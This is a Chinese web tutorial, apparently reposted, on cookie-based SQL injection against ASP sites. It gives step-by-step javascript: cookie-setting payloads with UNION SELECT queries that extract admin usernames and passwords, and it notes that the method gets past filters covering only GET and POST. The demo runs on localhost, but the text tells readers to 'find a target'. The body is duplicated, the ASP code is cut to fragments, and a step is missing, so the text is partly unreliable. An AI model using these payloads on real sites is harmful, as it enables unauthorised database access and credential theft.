教你學(xué)會Cookie與聯(lián)合查詢的注入
發(fā)布日期:2021-12-18 14:30 | 文章來源:腳本之家
具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細(xì)節(jié)。隱私報(bào)告里設(shè)置處需要接受所有的cookie將安全降低。
具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細(xì)節(jié)。隱私報(bào)告里設(shè)置處需要接受所有的cookie將安全降低。
cookie值是連接后才保存到本機(jī)的,也就是關(guān)IE后.
前提條件:一、網(wǎng)站沒有過濾cookie方式的注入。
二、需事前了解數(shù)據(jù)庫的管理員表段名,計(jì)算一下注入文件數(shù)據(jù)庫查詢語句在數(shù)據(jù)庫中的列數(shù)。
打開數(shù)據(jù)庫,找到Product這個(gè)表名,計(jì)算字段數(shù)為21個(gè)。管理員表名為admin 用戶與密碼字段名為username、password,呵呵沒有注入文件,我們可以自己構(gòu)造一個(gè)測試方便大家的理解。
構(gòu)造如下簡單注入ASP,當(dāng)然我沒作什么嚴(yán)格的過濾,也就是接受任何方式的提交。.
//調(diào)用數(shù)據(jù)庫連接文件
")
else
%>
//反回指針處的內(nèi)容,選取的字段與管理員的用戶密碼類型要相同
找前圖中的ID=55
構(gòu)造聯(lián)合查詢語句
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 將6,2分別用username、password替換
來試試cookie注入。找個(gè)目標(biāo),注入點(diǎn)結(jié)構(gòu)與前面相近就不再分析了,僅過濾了post與get注入.
步驟一:重新打開IE,先連接到需注入的網(wǎng)站http://127.0.0.1/nf,也就是去除前面的鏈接值。注意:不要直接在前面圖中的鏈接處操作,可以會不成功噢。
步驟二:清空地址處IE,再次在地址中加入如下
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
再次清空IE打入http://127.0.0.1/nf/ProductShow.asp
步驟四:重復(fù)步驟一.注意此步驟必需操作,很多人失敗就在這里。
步驟五:清空地址處IE,再次在地址中如下代碼
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
步驟六、再次清空地址處IE。http://127.0.0.1/nf/ProductShow.asp
好了全文結(jié)束。
具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細(xì)節(jié)。隱私報(bào)告里設(shè)置處需要接受所有的cookie將安全降低。
cookie值是連接后才保存到本機(jī)的,也就是關(guān)IE后.
前提條件:一、網(wǎng)站沒有過濾cookie方式的注入。
二、需事前了解數(shù)據(jù)庫的管理員表段名,計(jì)算一下注入文件數(shù)據(jù)庫查詢語句在數(shù)據(jù)庫中的列數(shù)。
打開數(shù)據(jù)庫,找到Product這個(gè)表名,計(jì)算字段數(shù)為21個(gè)。管理員表名為admin 用戶與密碼字段名為username、password,呵呵沒有注入文件,我們可以自己構(gòu)造一個(gè)測試方便大家的理解。
構(gòu)造如下簡單注入ASP,當(dāng)然我沒作什么嚴(yán)格的過濾,也就是接受任何方式的提交。.
//調(diào)用數(shù)據(jù)庫連接文件
")
else
%>
//反回指針處的內(nèi)容,選取的字段與管理員的用戶密碼類型要相同
找前圖中的ID=55
構(gòu)造聯(lián)合查詢語句
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 將6,2分別用username、password替換
來試試cookie注入。找個(gè)目標(biāo),注入點(diǎn)結(jié)構(gòu)與前面相近就不再分析了,僅過濾了post與get注入.
步驟一:重新打開IE,先連接到需注入的網(wǎng)站http://127.0.0.1/nf,也就是去除前面的鏈接值。注意:不要直接在前面圖中的鏈接處操作,可以會不成功噢。
步驟二:清空地址處IE,再次在地址中加入如下
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
再次清空IE打入http://127.0.0.1/nf/ProductShow.asp
步驟四:重復(fù)步驟一.注意此步驟必需操作,很多人失敗就在這里。
步驟五:清空地址處IE,再次在地址中如下代碼
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
步驟六、再次清空地址處IE。http://127.0.0.1/nf/ProductShow.asp
好了全文結(jié)束。
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章
關(guān)注官方微信